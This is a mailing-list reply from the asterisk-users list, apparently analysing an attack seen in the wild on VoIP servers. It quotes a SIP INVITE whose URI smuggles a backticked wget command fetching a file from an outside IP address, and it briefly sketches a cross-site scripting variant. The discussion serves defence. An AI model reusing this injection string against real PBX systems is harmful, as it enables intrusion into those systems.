On 09/11/2011 07:05 PM, Tom Browning wrote:
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link.
A more sophisticated variant of that would embed <script> tags and a with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack.
-- Alex Balashov - Principal Evariste Systems LLC 260 Peachtree Street NW Suite 2200 Atlanta, GA 30303 Tel: +1-678-954-0670 Fax: +1-404-961-1892 Web: http://www.evaristesys.com/ -- _____________________________________________________________________ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
